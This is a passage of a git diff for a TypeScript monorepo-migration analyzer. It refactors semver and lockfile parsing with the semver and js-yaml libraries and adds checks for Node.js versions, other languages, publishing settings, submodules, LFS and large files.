monorepo workflow', + }); + } + + logger.debug(`CI analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/analyzers/dependencies.ts b/src/analyzers/dependencies.ts index de5de30..7c3c466 100755 --- a/src/analyzers/dependencies.ts +++ b/src/analyzers/dependencies.ts @@ -1,4 +1,5 @@ import path from 'node:path'; +import semver from 'semver'; import type { PackageInfo, DependencyConflict, @@ -48,7 +49,8 @@ export function isWildcardVersion(version: string): boolean { } /** - * Parse a semver version string into components + * Parse a semver version string into components. + * Strips range operators (^, ~, >=, etc.) and extracts the base version. */ export function parseSemver(version: string): { major: number; minor: number; patch: number; prerelease?: string } | null { // Skip non-semver versions @@ -61,26 +63,53 @@ export function parseSemver(version: string): { major: number; minor: number; pa return null; } - // Remove leading ^, ~, =, >=, <=, <, > - const cleaned = version.replace(/^[\^~=><]+/, '').replace(/^>=|<=|>| use minimal satisfying version as canonical representative + const validRange = semver.validRange(trimmed, { loose: true }); + if (validRange) { + const min = semver.minVersion(validRange, { loose: true }); + if (min) { + return { + major: min.major, + minor: min.minor, + patch: min.patch, + prerelease: min.prerelease.length ? min.prerelease.join('.') : undefined, + }; + } + } - return { - major: parseInt(match[1], 10), - minor: parseInt(match[2], 10), - patch: parseInt(match[3], 10), - prerelease: match[4], - }; + // 3) Loose/coercible forms + const coerced = semver.coerce(trimmed, { loose: true }); + if (coerced) { + return { + major: coerced.major, + minor: coerced.minor, + patch: coerced.patch, + }; + } + } catch { + return null; + } + + return null; } /** - * Compare two semver versions + * Compare two semver versions using the semver package. * Returns: -1 if a < b, 0 if a == b, 1 if a > b */ function compareSemver(a: string, b: string): number { @@ -94,25 +123,9 @@ function compareSemver(a: string, b: string): number { if (!parsedA) return -1; // Non-semver goes first (lower priority) if (!parsedB) return 1; - // Compare major.minor.patch - if (parsedA.major !== parsedB.major) { - return parsedA.major - parsedB.major; - } - if (parsedA.minor !== parsedB.minor) { - return parsedA.minor - parsedB.minor; - } - if (parsedA.patch !== parsedB.patch) { - return parsedA.patch - parsedB.patch; - } - - // Handle pre-release (versions without pre-release are higher) - if (parsedA.prerelease && !parsedB.prerelease) return -1; - if (!parsedA.prerelease && parsedB.prerelease) return 1; - if (parsedA.prerelease && parsedB.prerelease) { - return parsedA.prerelease.localeCompare(parsedB.prerelease); - } - - return 0; + const verA = `${parsedA.major}.${parsedA.minor}.${parsedA.patch}${parsedA.prerelease ? `-${parsedA.prerelease}` : ''}`; + const verB = `${parsedB.major}.${parsedB.minor}.${parsedB.patch}${parsedB.prerelease ? `-${parsedB.prerelease}` : ''}`; + return semver.compare(verA, verB); } /** @@ -145,7 +158,11 @@ function determineConflictSeverity(versions: string[]): ConflictSeverity { /** * Read package.json from a directory */ -async function readPackageJson(repoPath: string, repoName: string): Promise { +async function readPackageJson( + repoPath: string, + repoName: string, + warnings: DependencyWarning[] +): Promise { const packageJsonPath = path.join(repoPath, 'package.json'); if (!(await pathExists(packageJsonPath))) { @@ -165,8 +182,14 @@ async function readPackageJson(repoPath: string, repoName: string): Promise { +async function findPackages( + repoPath: string, + repoName: string, + warnings: DependencyWarning[] +): Promise { const packages: PackageInfo[] = []; // First, read the root package.json - const rootPkg = await readPackageJson(repoPath, repoName); + const rootPkg = await readPackageJson(repoPath, repoName, warnings); if (rootPkg) { packages.push(rootPkg); } @@ -193,10 +220,14 @@ export interface DependencyWarning { name: string; version: string; source: string; - type: 'git' | 'file' | 'url' | 'wildcard' | 'prerelease'; + type: 'git' | 'file' | 'url' | 'wildcard' | 'prerelease' | 'parse-error'; message: string; } +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + /** * Detect conflicts between resolved versions across repos. */ @@ -250,14 +281,24 @@ export async function analyzeDependencies( // Collect all packages from all repos for (const repo of repoPaths) { - const packages = await findPackages(repo.path, repo.name); + const packages = await findPackages(repo.path, repo.name, warnings); allPackages.push(...packages); } // Parse lockfiles for each repo const lockfileResolutions: LockfileResolution[] = []; for (const repo of repoPaths) { - const resolution = await parseLockfile(repo.path, repo.name); + const resolution = await parseLockfile(repo.path, repo.name, { + onParseWarning: (message) => { + warnings.push({ + name: 'lockfile', + version: 'invalid', + source: repo.name, + type: 'parse-error', + message, + }); + }, + }); if (resolution) { lockfileResolutions.push(resolution); } diff --git a/src/analyzers/environment.ts b/src/analyzers/environment.ts new file mode 100755 index 0000000..ac9db37 --- /dev/null +++ b/src/analyzers/environment.ts @@ -0,0 +1,89 @@ +import path from 'node:path'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, readFile, readJson } from '../utils/fs.js'; + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + +/** + * Analyze Node.js environment signals across repositories. + * Detects .nvmrc, .node-version, engines.node and flags mismatches. + */ +export async function analyzeEnvironment( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + const nodeVersions: Array<{ repo: string; source: string; version: string }> = []; + + for (const repo of repoPaths) { + // Check .nvmrc + const nvmrcPath = path.join(repo.path, '.nvmrc'); + if (await pathExists(nvmrcPath)) { + const content = (await readFile(nvmrcPath)).trim(); + nodeVersions.push({ repo: repo.name, source: '.nvmrc', version: content }); + } + + // Check .node-version + const nodeVersionPath = path.join(repo.path, '.node-version'); + if (await pathExists(nodeVersionPath)) { + const content = (await readFile(nodeVersionPath)).trim(); + nodeVersions.push({ repo: repo.name, source: '.node-version', version: content }); + } + + // Check engines.node in package.json + const pkgPath = path.join(repo.path, 'package.json'); + if (await pathExists(pkgPath)) { + try { + const pkg = (await readJson(pkgPath)) as Record; + const engines = pkg.engines as Record | undefined; + if (engines?.node) { + nodeVersions.push({ repo: repo.name, source: 'engines.node', version: engines.node }); + } + } catch (error) { + findings.push({ + id: `env-malformed-package-json-${repo.name}`, + title: `Malformed package.json in ${repo.name}`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: getErrorMessage(error) }], + suggestedAction: 'Fix package.json syntax before running analysis.', + }); + } + } + + // Check for missing version indicators + const hasNvmrc = await pathExists(nvmrcPath); + const hasNodeVersion = await pathExists(nodeVersionPath); + if (!hasNvmrc && !hasNodeVersion) { + findings.push({ + id: `env-no-node-version-${repo.name}`, + title: `No Node.js version file in ${repo.name}`, + severity: 'info', + confidence: 'high', + evidence: [{ path: repo.path }], + suggestedAction: 'Add .nvmrc or .node-version file for consistent Node.js version', + }); + } + } + + // Detect mismatches + const uniqueVersions = [...new Set(nodeVersions.map((v) => v.version))]; + if (uniqueVersions.length > 1) { + findings.push({ + id: 'env-node-mismatch', + title: 'Inconsistent Node.js versions across repositories', + severity: 'warn', + confidence: 'high', + evidence: nodeVersions.map((v) => ({ + path: v.repo, + snippet: `${v.source}: ${v.version}`, + })), + suggestedAction: `Standardize on a single Node.js version. Detected: ${uniqueVersions.join(', ')}`, + }); + } + + logger.debug(`Environment analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/analyzers/files.ts b/src/analyzers/files.ts index cd05340..187254f 100644 --- a/src/analyzers/files.ts +++ b/src/analyzers/files.ts @@ -71,7 +71,7 @@ export async function detectFileCollisions( sources.push(repo.name); fileMap.set(file, sources); } - } catch { + } catch (_err) { // Skip repos that can't be read } } @@ -110,7 +110,8 @@ export async function filesAreIdentical(file1: string, file2: string): Promise, + logger?: Logger, +): Promise { + const detections: LanguageDetection[] = []; + + for (const repo of repoPaths) { + const languages: LanguageDetection['languages'] = []; + + // Check Go + const goMod = path.join(repo.path, 'go.mod'); + if (await pathExists(goMod)) { + const content = await readFile(goMod); + const moduleMatch = content.match(/^module\s+(.+)$/m); + const metadata: Record = {}; + if (moduleMatch?.[1]?.trim()) { + metadata.module = moduleMatch[1].trim(); + } + languages.push({ + name: 'go', + markers: ['go.mod'], + ...(Object.keys(metadata).length > 0 ? { metadata } : {}), + }); + } + + // Check Rust + const cargoToml = path.join(repo.path, 'Cargo.toml'); + if (await pathExists(cargoToml)) { + const content = await readFile(cargoToml); + const nameMatch = content.match(/^\[package\][\s\S]*?name\s*=\s*"([^"]+)"/m); + const metadata: Record = {}; + if (nameMatch?.[1]) { + metadata.crate = nameMatch[1]; + } + languages.push({ + name: 'rust', + markers: ['Cargo.toml'], + ...(Object.keys(metadata).length > 0 ? { metadata } : {}), + }); + } + + // Check Python + const pyproject = path.join(repo.path, 'pyproject.toml'); + const requirements = path.join(repo.path, 'requirements.txt'); + if (await pathExists(pyproject)) { + languages.push({ + name: 'python', + markers: ['pyproject.toml'], + }); + } else if (await pathExists(requirements)) { + languages.push({ + name: 'python', + markers: ['requirements.txt'], + }); + } + + if (languages.length > 0) { + detections.push({ + repoName: repo.name, + languages, + }); + } + } + + logger?.info(`Detected ${detections.reduce((sum, d) => sum + d.languages.length, 0)} non-JS language(s)`); + return detections; +} diff --git a/src/analyzers/lockfile.ts b/src/analyzers/lockfile.ts index 0a7105f..4031743 100755 --- a/src/analyzers/lockfile.ts +++ b/src/analyzers/lockfile.ts @@ -1,13 +1,114 @@ import path from 'node:path'; +import yaml from 'js-yaml'; +import semver from 'semver'; import type { LockfileResolution } from '../types/index.js'; import { pathExists, readFile } from '../utils/fs.js'; +interface ParseLockfileOptions { + onParseWarning?: (message: string) => void; +} + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + +function normalizeResolvedVersion(version: string): string { + return version + .replace(/^npm:/, '') + .replace(/\(.*$/, '') + .replace(/_.+$/, '') + .trim(); +} + +function choosePreferredVersion(existing: string | undefined, incoming: string): string { + if (!existing) return incoming; + if (existing === incoming) return existing; + + const existingParsed = semver.coerce(existing, { includePrerelease: true, loose: true }); + const incomingParsed = semver.coerce(incoming, { includePrerelease: true, loose: true }); + + if (existingParsed && incomingParsed) { + return semver.gt(incomingParsed, existingParsed) ? incoming : existing; + } + if (!existingParsed && incomingParsed) return incoming; + return existing; +} + +function setResolvedVersion( + target: Record, + name: string, + rawVersion: string +): void { + const version = normalizeResolvedVersion(rawVersion); + if (!name || !version) return; + target[name] = choosePreferredVersion(target[name], version); +} + +function extractYarnPackageName(selector: string): string | null { + const trimmed = selector.trim().replace(/^["']|["']$/g, ''); + if (!trimmed || trimmed.startsWith('__')) return null; + + if (trimmed.startsWith('@')) { + const secondAt = trimmed.indexOf('@', 1); + if (secondAt <= 1) return null; + return trimmed.slice(0, secondAt); + } + + const atIndex = trimmed.indexOf('@'); + if (atIndex <= 0) return null; + return trimmed.slice(0, atIndex); +} + +function extractNpmPackageNameFromPath(pkgPath: string): string | null { + if (!pkgPath.startsWith('node_modules/')) return null; + const relative = pkgPath.slice('node_modules/'.length); + const segments = relative.split('/'); + + if (segments[0]?.startsWith('@')) { + if (segments.length < 2) return null; + return `${segments[0]}/${segments[1]}`; + } + return segments[0] || null; +} + +function parsePnpmPackageKey(rawKey: string): { name: string; version: string } | null { + const key = rawKey.replace(/^\//, '').replace(/\(.*$/, ''); + + // New style: name@1.2.3 or @scope/name@1.2.3 + const atIndex = key.lastIndexOf('@'); + if (atIndex > 0 && key[atIndex - 1] !== '/') { + return { + name: key.slice(0, atIndex), + version: normalizeResolvedVersion(key.slice(atIndex + 1)), + }; + } + + // Old slash style: /name/1.2.3 or /@scope/name/1.2.3 + const scopedSlashMatch = key.match(/^(@[^/]+\/[^/]+)\/([^/]+)$/); + if (scopedSlashMatch) { + return { + name: scopedSlashMatch[1], + version: normalizeResolvedVersion(scopedSlashMatch[2]), + }; + } + const unscopedSlashMatch = key.match(/^([^/@][^/]*)\/([^/]+)$/); + if (unscopedSlashMatch) { + return { + name: unscopedSlashMatch[1], + version: normalizeResolvedVersion(unscopedSlashMatch[2]), + }; + } + + return null; +} + /** * Try each lockfile format in a repo dir. Returns null if none found. */ export async function parseLockfile( repoPath: string, - repoName: string + repoName: string, + options: ParseLockfileOptions = {} ): Promise { // Try pnpm-lock.yaml const pnpmLockPath = path.join(repoPath, 'pnpm-lock.yaml'); @@ -18,8 +119,15 @@ export async function parseLockfile( if (Object.keys(resolvedVersions).length > 0) { return { packageManager: 'pnpm', repoName, resolvedVersions }; } - } catch { - // Parse failure — fall through + if (content.trim().length > 0) { + options.onParseWarning?.( + `No parsable dependencies found in ${pnpmLockPath} for ${repoName}` + ); + } + } catch (error) { + options.onParseWarning?.( + `Failed to parse ${pnpmLockPath} for ${repoName}: ${getErrorMessage(error)}` + ); } } @@ -32,8 +140,15 @@ export async function parseLockfile( if (Object.keys(resolvedVersions).length > 0) { return { packageManager: 'yarn', repoName, resolvedVersions }; } - } catch { - // Parse failure — fall through + if (content.trim().length > 0) { + options.onParseWarning?.( + `No parsable dependencies found in ${yarnLockPath} for ${repoName}` + ); + } + } catch (error) { + options.onParseWarning?.( + `Failed to parse ${yarnLockPath} for ${repoName}: ${getErrorMessage(error)}` + ); } } @@ -46,8 +161,15 @@ export async function parseLockfile( if (Object.keys(resolvedVersions).length > 0) { return { packageManager: 'npm', repoName, resolvedVersions }; } - } catch { - // Parse failure — fall through + if (content.trim().length > 0) { + options.onParseWarning?.( + `No parsable dependencies found in ${npmLockPath} for ${repoName}` + ); + } + } catch (error) { + options.onParseWarning?.( + `Failed to parse ${npmLockPath} for ${repoName}: ${getErrorMessage(error)}` + ); } } @@ -55,61 +177,81 @@ export async function parseLockfile( } /** - * Parse pnpm-lock.yaml — extract dependency versions. + * Parse pnpm-lock.yaml — extract dependency versions using js-yaml. * Supports both lockfileVersion >= 6 (importers format) and older flat format. */ export function parsePnpmLock(content: string): Record { const result: Record = {}; try { - // Detect lockfile version - const versionMatch = content.match(/lockfileVersion:\s*'?(\d+(?:\.\d+)?)'?/); - const lockfileVersion = versionMatch ? parseFloat(versionMatch[1]) : 0; + const lockData = yaml.load(content) as Record | null; + if (!lockData || typeof lockData !== 'object') return result; + + const lockfileVersion = typeof lockData.lockfileVersion === 'string' + ? parseFloat(lockData.lockfileVersion) + : typeof lockData.lockfileVersion === 'number' + ? lockData.lockfileVersion + : 0; + // Modern format (lockfileVersion >= 6): importers['.'] dependency sections if (lockfileVersion >= 6) { - // Modern format: importers['.'].dependencies / devDependencies - // Look for importers > '.' > dependencies/devDependencies sections - const importersMatch = content.match(/importers:\s*\n\s+['.]?\.?['.]?:\s*\n([\s\S]*?)(?=\nimporters:|\npackages:|\nlockfileVersion:|\n\S|$)/); - if (importersMatch) { - const importerBlock = importersMatch[1]; - // Match entries like: package-name: - // specifier: ^1.0.0 - // version: 1.2.3 - const entryPattern = /^\s{6,8}(\S+):\s*\n\s+specifier:.*\n\s+version:\s*['"]?([^('"\n\s]+)/gm; - let match; - while ((match = entryPattern.exec(importerBlock)) !== null) { - const name = match[1].replace(/^['"]|['"]$/g, ''); - const version = match[2].replace(/\(.*$/, '').trim(); - result[name] = version; + const importers = lockData.importers as Record> | undefined; + const rootImporter = importers?.['.']; + if (rootImporter) { + for (const section of ['dependencies', 'devDependencies', 'optionalDependencies'] as const) { + const deps = rootImporter[section] as Record | undefined; + if (deps && typeof deps === 'object') { + for (const [name, entry] of Object.entries(deps)) { + if (typeof entry === 'string') { + setResolvedVersion(result, name, entry); + continue; + } + if (entry && typeof entry === 'object') { + const resolved = (entry as { version?: string }).version; + if (typeof resolved === 'string') { + setResolvedVersion(result, name, resolved); + } + } + } + } } } } // Flat format (older) or fallback: root-level dependencies/devDependencies if (Object.keys(result).length === 0) { - // Match root dependencies: section - const sections = ['dependencies:', 'devDependencies:']; - for (const sectionHeader of sections) { - const sectionRegex = new RegExp( - `^${sectionHeader}\\s*\\n((?:\\s{2}\\S.*\\n)*)`, - 'm' - ); - const sectionMatch = content.match(sectionRegex); - if (sectionMatch) { - const lines = sectionMatch[1].split('\n'); - for (const line of lines) { - // Match " package-name: version" or " package-name: 'version'" - const lineMatch = line.match(/^\s{2}(\S+):\s+['"]?([^'"\n\s]+)/); - if (lineMatch) { - const name = lineMatch[1].replace(/^['"]|['"]$/g, ''); - result[name] = lineMatch[2]; + for (const section of ['dependencies', 'devDependencies', 'optionalDependencies'] as const) { + const deps = lockData[section] as Record> | undefined; + if (deps && typeof deps === 'object') { + for (const [name, value] of Object.entries(deps)) { + if (typeof value === 'string') { + setResolvedVersion(result, name, value); + } else if (typeof value === 'object' && value !== null && 'version' in value) { + setResolvedVersion(result, name, String((value as { version: unknown }).version)); } } } } } - } catch { - // Return empty on any parse error + + // Fallback to packages map if importer/root dependency sections are absent. + if (Object.keys(result).length === 0 && lockData.packages && typeof lockData.packages === 'object') { + for (const [rawKey, value] of Object.entries(lockData.packages as Record)) { + const parsed = parsePnpmPackageKey(rawKey); + if (!parsed) continue; + + if (value && typeof value === 'object' && 'version' in (value as Record)) { + const explicitVersion = (value as { version?: string }).version; + if (typeof explicitVersion === 'string') { + setResolvedVersion(result, parsed.name, explicitVersion); + continue; + } + } + setResolvedVersion(result, parsed.name, parsed.version); + } + } + } catch (_err) { + // pnpm lock parse error; return empty } return result; @@ -123,31 +265,39 @@ export function parseYarnLock(content: string): Record { const result: Record = {}; try { - const isBerry = content.includes('__metadata:'); - - if (isBerry) { - // Berry format: "name@npm:range": - // version: x.y.z - const entryPattern = /^"?(@?[^@\n"]+)@(?:npm:)?[^":\n]*"?:\s*\n\s+version:?\s+["']?(\d+\.\d+\.\d+[^"'\n\s]*)["']?/gm; - let match; - while ((match = entryPattern.exec(content)) !== null) { - const name = match[1].trim(); - // Skip __metadata and other special entries - if (name.startsWith('__') || name.includes('workspace:')) continue; - result[name] = match[2]; + const lines = content.split(/\r?\n/); + let activeSelectors: string[] = []; + + for (const line of lines) { + const trimmed = line.trim(); + if (!trimmed) continue; + + // Entry header line, e.g. + // "react@^18.0.0": + // "react@^18.0.0, react@^18.2.0": + if (!line.startsWith(' ') && trimmed.endsWith(':')) { + activeSelectors = trimmed + .slice(0, -1) + .split(',') + .map((selector) => selector.trim().replace(/^["']|["']$/g, '')) + .filter(Boolean); + continue; } - } else { - // Classic v1 format: "name@range", name@range: - // version "x.y.z" - const entryPattern = /^"?(@?[^@\n"]+)@[^:\n]*"?:\s*\n\s+version\s+"([^"]+)"/gm; - let match; - while ((match = entryPattern.exec(content)) !== null) { - const name = match[1].trim(); - result[name] = match[2]; + + if (activeSelectors.length === 0) continue; + + const versionMatch = line.match(/^\s+version:?\s+["']?([^"'\s]+)["']?/); + if (!versionMatch) continue; + + const version = versionMatch[1]; + for (const selector of activeSelectors) { + const packageName = extractYarnPackageName(selector); + if (!packageName) continue; + setResolvedVersion(result, packageName, version); } } - } catch { - // Return empty on any parse error + } catch (_err) { + // yarn lock parse error; return empty } return result; @@ -165,16 +315,13 @@ export function parsePackageLock(content: string): Record { // v2/v3 format uses "packages" key if (lockData.packages && typeof lockData.packages === 'object') { for (const [pkgPath, pkgData] of Object.entries(lockData.packages)) { - // Skip root package (empty string key) and nested node_modules - if (!pkgPath.startsWith('node_modules/')) continue; - - // Only direct dependencies (no nested node_modules) - const relativePath = pkgPath.slice('node_modules/'.length); - if (relativePath.includes('node_modules/')) continue; - + // Skip root package (empty string key). + if (!pkgPath) continue; + const depName = extractNpmPackageNameFromPath(pkgPath); + if (!depName) continue; const data = pkgData as { version?: string }; if (data.version) { - result[relativePath] = data.version; + setResolvedVersion(result, depName, data.version); } } } @@ -188,12 +335,12 @@ export function parsePackageLock(content: string): Record { for (const [name, data] of Object.entries(lockData.dependencies)) { const depData = data as { version?: string }; if (depData.version) { - result[name] = depData.version; + setResolvedVersion(result, name, depData.version); } } } - } catch { - // Return empty on any parse error + } catch (_err) { + // package-lock.json parse error; return empty } return result; diff --git a/src/analyzers/peers.ts b/src/analyzers/peers.ts index 70cc37e..65ef742 100755 --- a/src/analyzers/peers.ts +++ b/src/analyzers/peers.ts @@ -1,91 +1,50 @@ +import semver from 'semver'; import type { PackageInfo, DependencyConflict, LockfileResolution, ConfidenceLevel, } from '../types/index.js'; -import { parseSemver } from './dependencies.js'; +import { getHighestVersion } from './dependencies.js'; -/** - * Basic semver range satisfaction check. - * Supports ^, ~, >=, exact match. Complex ranges (||, -) return false. - */ -export function satisfiesRange(version: string, range: string): boolean { - const trimmed = range.trim(); +function normalizeToSemver(version: string): string | null { + try { + const exact = semver.valid(version, { loose: true }); + if (exact) return exact; - // Complex ranges — cannot reliably check - if (trimmed.includes('||') || trimmed.includes(' - ')) { - return false; - } - - const parsed = parseSemver(version); - if (!parsed) return false; - - // Exact match - if (/^\d+\.\d+\.\d+/.test(trimmed)) { - const rangeParsed = parseSemver(trimmed); - if (!rangeParsed) return false; - return ( - parsed.major === rangeParsed.major && - parsed.minor === rangeParsed.minor && - parsed.patch === rangeParsed.patch - ); - } - - // Caret range: ^major.minor.patch — compatible with major - if (trimmed.startsWith('^')) { - const rangeParsed = parseSemver(trimmed); - if (!rangeParsed) return false; - - if (rangeParsed.major > 0) { - // ^1.2.3 means >=1.2.3 <2.0.0 - if (parsed.major !== rangeParsed.major) return false; - if (parsed.minor < rangeParsed.minor) return false; - if (parsed.minor === rangeParsed.minor && parsed.patch < rangeParsed.patch) return false; - return true; + const validRange = semver.validRange(version, { loose: true }); + if (validRange) { + const min = semver.minVersion(validRange, { loose: true }); + if (min) return min.version; } - // ^0.x — compatible with minor - if (parsed.major !== 0) return false; - if (parsed.minor !== rangeParsed.minor) return false; - if (parsed.patch < rangeParsed.patch) return false; - return true; - } - // Tilde range: ~major.minor.patch — compatible with minor - if (trimmed.startsWith('~')) { - const rangeParsed = parseSemver(trimmed); - if (!rangeParsed) return false; - if (parsed.major !== rangeParsed.major) return false; - if (parsed.minor !== rangeParsed.minor) return false; - if (parsed.patch < rangeParsed.patch) return false; - return true; + const coerced = semver.coerce(version, { loose: true }); + if (coerced) return coerced.version; + } catch { + return null; } - // >= range - if (trimmed.startsWith('>=')) { - const rangeParsed = parseSemver(trimmed); - if (!rangeParsed) return false; - if (parsed.major > rangeParsed.major) return true; - if (parsed.major < rangeParsed.major) return false; - if (parsed.minor > rangeParsed.minor) return true; - if (parsed.minor < rangeParsed.minor) return false; - return parsed.patch >= rangeParsed.patch; - } - - return false; + return null; } /** - * Check if a range is "complex" — contains || or hyphen ranges. + * Semver range satisfaction check using the semver package. + * Handles all range types including complex ranges (||, hyphen, etc.). */ -function isComplexRange(range: string): boolean { - return range.includes('||') || range.includes(' - '); +export function satisfiesRange(version: string, range: string): boolean { + const cleanVersion = normalizeToSemver(version); + if (!cleanVersion) return false; + + try { + return semver.satisfies(cleanVersion, range, { includePrerelease: true, loose: true }); + } catch { + return false; + } } /** * Check if peerDep ranges are satisfied by available dependency versions. - * Returns conflicts with confidence 'medium' (or 'low' for complex ranges), - * conflictSource 'peer-constraint'. + * Returns conflicts with confidence 'high', conflictSource 'peer-constraint'. */ export function analyzePeerDependencies( packages: PackageInfo[], @@ -129,44 +88,19 @@ export function analyzePeerDependencies( if (!bestVersion) { const versions = declaredVersions.get(peerDepName); if (versions && versions.length > 0) { - // Use the first declared version (stripped of range prefixes) as approximation - const parsed = parseSemver(versions[0]); - if (parsed) { - bestVersion = `${parsed.major}.${parsed.minor}.${parsed.patch}`; - } + const bestDeclared = getHighestVersion(versions); + const normalized = normalizeToSemver(bestDeclared); + if (normalized) bestVersion = normalized; } } // If no version found at all, skip (can't validate) if (!bestVersion) continue; - const complex = isComplexRange(peerRange); - const confidence: ConfidenceLevel = complex ? 'low' : 'medium'; - - // For complex ranges, we can't reliably check, so report with low confidence - if (complex) { - conflicts.push({ - name: peerDepName, - versions: [ - { - version: peerRange, - source: `${pkg.repoName} (peer)`, - type: 'peerDependencies', - }, - { - version: bestVersion, - source: 'available', - type: 'dependencies', - }, - ], - severity: 'major', - confidence, - conflictSource: 'peer-constraint', - }); - continue; - } + // semver.satisfies handles all range types (^, ~, ||, hyphen, etc.) + // Use 'high' confidence since the semver package is authoritative + const confidence: ConfidenceLevel = 'high'; - // Check satisfaction if (!satisfiesRange(bestVersion, peerRange)) { conflicts.push({ name: peerDepName, diff --git a/src/analyzers/publishing.ts b/src/analyzers/publishing.ts new file mode 100755 index 0000000..d0d54c5 --- /dev/null +++ b/src/analyzers/publishing.ts @@ -0,0 +1,121 @@ +import path from 'node:path'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, readJson } from '../utils/fs.js'; + +function getErrorMessage(error: unknown): string { + return error instanceof Error ? error.message : String(error); +} + +/** + * Analyze publishing configuration across repositories. + * Detects publishConfig, private:false, registry settings, etc. + */ +export async function analyzePublishing( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + const publishablePackages: Array<{ repo: string; name: string; registry?: string }> = []; + + for (const repo of repoPaths) { + const pkgPath = path.join(repo.path, 'package.json'); + if (!(await pathExists(pkgPath))) continue; + + try { + const pkg = (await readJson(pkgPath)) as Record; + const isPrivate = pkg.private === true; + const publishConfig = pkg.publishConfig as Record | undefined; + const pkgName = (pkg.name as string) || repo.name; + + // Detect publishable packages + if (!isPrivate) { + publishablePackages.push({ + repo: repo.name, + name: pkgName, + registry: publishConfig?.registry, + }); + + if (!publishConfig) { + findings.push({ + id: `publishing-no-config-${repo.name}`, + title: `${repo.name} is publishable but has no publishConfig`, + severity: 'info', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: `private: ${pkg.private ?? 'undefined'}` }], + suggestedAction: 'Add publishConfig with access and registry settings', + }); + } + } + + // Detect custom registries + if (publishConfig?.registry && publishConfig.registry !== 'https://registry.npmjs.org/') { + findings.push({ + id: `publishing-custom-registry-${repo.name}`, + title: `${repo.name} uses a custom registry`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: `registry: ${publishConfig.registry}` }], + suggestedAction: 'Ensure the custom registry is accessible from the monorepo CI', + }); + } + + // Detect files/main/exports configuration + if (!isPrivate) { + const hasMain = !!pkg.main; + const hasExports = !!pkg.exports; + const hasFiles = !!pkg.files; + + if (!hasMain && !hasExports) { + findings.push({ + id: `publishing-no-entry-${repo.name}`, + title: `${repo.name} has no main or exports field`, + severity: 'info', + confidence: 'medium', + evidence: [{ path: pkgPath }], + suggestedAction: 'Add main or exports field to package.json for proper module resolution', + }); + } + + if (!hasFiles) { + findings.push({ + id: `publishing-no-files-${repo.name}`, + title: `${repo.name} has no files field`, + severity: 'info', + confidence: 'medium', + evidence: [{ path: pkgPath }], + suggestedAction: 'Add files field to limit published package contents', + }); + } + } + } catch (error) { + findings.push({ + id: `publishing-malformed-package-json-${repo.name}`, + title: `Malformed package.json in ${repo.name}`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: pkgPath, snippet: getErrorMessage(error) }], + suggestedAction: 'Fix package.json syntax before assessing publishing configuration.', + }); + } + } + + // Summary finding + if (publishablePackages.length > 0) { + const registries = [...new Set(publishablePackages.map((p) => p.registry).filter(Boolean))]; + if (registries.length > 1) { + findings.push({ + id: 'publishing-multiple-registries', + title: 'Multiple npm registries in use', + severity: 'warn', + confidence: 'high', + evidence: publishablePackages + .filter((p) => p.registry) + .map((p) => ({ path: p.repo, snippet: `registry: ${p.registry}` })), + suggestedAction: 'Standardize on a single registry or configure per-package publishConfig', + }); + } + } + + logger.debug(`Publishing analysis: ${findings.length} findings`); + return findings; +} diff --git a/src/analyzers/repo-risks.ts b/src/analyzers/repo-risks.ts new file mode 100755 index 0000000..1da6028 --- /dev/null +++ b/src/analyzers/repo-risks.ts @@ -0,0 +1,113 @@ +import path from 'node:path'; +import fs from 'fs-extra'; +import type { AnalysisFinding, Logger } from '../types/index.js'; +import { pathExists, readFile, listFiles } from '../utils/fs.js'; + +const LARGE_FILE_THRESHOLD = 1_000_000; // 1 MB + +/** + * Analyze repository risks: submodules, LFS, large files, case collisions. + */ +export async function analyzeRepoRisks( + repoPaths: Array<{ path: string; name: string }>, + logger: Logger, +): Promise { + const findings: AnalysisFinding[] = []; + + for (const repo of repoPaths) { + // Check for git submodules + const gitmodulesPath = path.join(repo.path, '.gitmodules'); + if (await pathExists(gitmodulesPath)) { + const content = await readFile(gitmodulesPath); + const submoduleCount = (content.match(/\[submodule/g) || []).length; + findings.push({ + id: `risk-submodules-${repo.name}`, + title: `${repo.name} contains git submodules`, + severity: 'error', + confidence: 'high', + evidence: [{ path: gitmodulesPath, snippet: `${submoduleCount} submodule(s)` }], + suggestedAction: 'Submodules must be resolved before migration. Inline or replace with npm dependencies.', + }); + } + + // Check for LFS + const gitattrsPath = path.join(repo.path, '.gitattributes'); + if (await pathExists(gitattrsPath)) { + const content = await readFile(gitattrsPath); + if (content.includes('filter=lfs')) { + const lfsPatterns = content + .split('\n') + .filter((l) => l.includes('filter=lfs')) + .map((l) => l.split(' ')[0]); + findings.push({ + id: `risk-lfs-${repo.name}`, + title: `${repo.name} uses Git LFS`, + severity: 'warn', + confidence: 'high', + evidence: lfsPatterns.map((p) => ({ + path: gitattrsPath, + snippet: `LFS tracked: ${p}`, + })), + suggestedAction: 'Ensure Git LFS is configured in the monorepo. LFS-tracked files must be migrated carefully.', + }); + } + } + + // Scan for large files (only root-level to avoid perf issues) + try { + const files = await listFiles(repo.path); + for (const file of files) { + const filePath = path.join(repo.path, file); + try { + const stat = await fs.stat(filePath); + if (stat.size > LARGE_FILE_THRESHOLD) { + findings.push({ + id: `risk-large-file-${repo.name}-${file}`, + title: `Large file in ${repo.name}: ${file}`, + severity: 'warn', + confidence: 'high', + evidence: [{ path: filePath, snippet: `${(stat.size / 1_000_000).toFixed(1)} MB` }], + suggestedAction: 'Consider using Git LFS or removing large files before migration', + }); + } + } catch (err) { + logger.debug?.('Failed to stat file ' + filePath + ': ' + (err instanceof Error ? err.message : String(err))); + } + } + } catch (err) { + logger.debug?.('Failed to list files in ' + repo.name + ': ' + (err instanceof Error ? err.message : String(err))); + } + } + + // Case collision detection across all repos + const allFiles = new Map>(); + for 